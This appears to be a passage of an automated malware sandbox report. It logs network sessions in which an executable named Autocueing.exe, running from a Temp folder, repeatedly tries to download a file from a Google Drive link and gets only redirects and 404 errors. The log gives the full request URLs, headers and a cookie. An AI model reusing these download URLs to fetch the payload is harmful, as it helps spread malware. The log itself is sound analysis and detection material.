                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:39 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:40 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTUaiXexMFMCoqCIRTPADVtnnGXbcwmvIAlF7t7uJj3I6uskdOJpSTaGwWg5q0Ov28F-f83TAU
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:40 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-3jU07yO4HtuUjBlGMVnmmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 33 75 73 58 76 64 67 6c 79 38 33 32 39 6d 6c 76 4b 6c 70 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U3usXvdgly8329mlvKlpdg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    34192.168.2.650019142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:41 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:41 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:41 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-uoo09eQ9ZSxNdT26A887Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    35192.168.2.650020142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:42 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:42 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQjEfiC34FFgvbldZVzkNM8SdDcyeU9WwPbnC0tT-a_HHKqPBMFTQ9zZ_bS-46aJy3VkkbndnU
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:42 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce--AE7jvXM4bG0xUBd2gWfgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 4a 61 34 44 79 75 75 67 56 32 48 45 74 4d 6e 75 51 72 64 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gJa4DyuugV2HEtMnuQrdoA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    36192.168.2.650021142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:43 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:43 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:43 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-tOV3uhpaLsNjK1ZgoGDdTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    37192.168.2.650022142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:44 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:45 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC41tdIZqWj2bJ9wxsCGeSj8fxuPMMV2NO7OKsxb5MghtivueGKB1A7M3sQkj3p39owpTNbcoms
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:44 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-07V-w6NUHALSx7f_8lMhig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 43 76 6e 34 72 50 63 7a 42 7a 74 37 69 34 75 59 42 54 42 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5Cvn4rPczBzt7i4uYBTBZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    38192.168.2.650023142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:45 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:46 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:46 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-WTooALJ87U39Y2nEmPBnzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    39192.168.2.650024142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:47 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:47 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgReaQ4vW_gm9KMDtxSwu4swMG04TGFzMfNO1Rw_TIwdOy7lJOY50G1hHo2_tQIgGCh-
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:47 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-NZxBQpieEWax83cT-Pyptg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
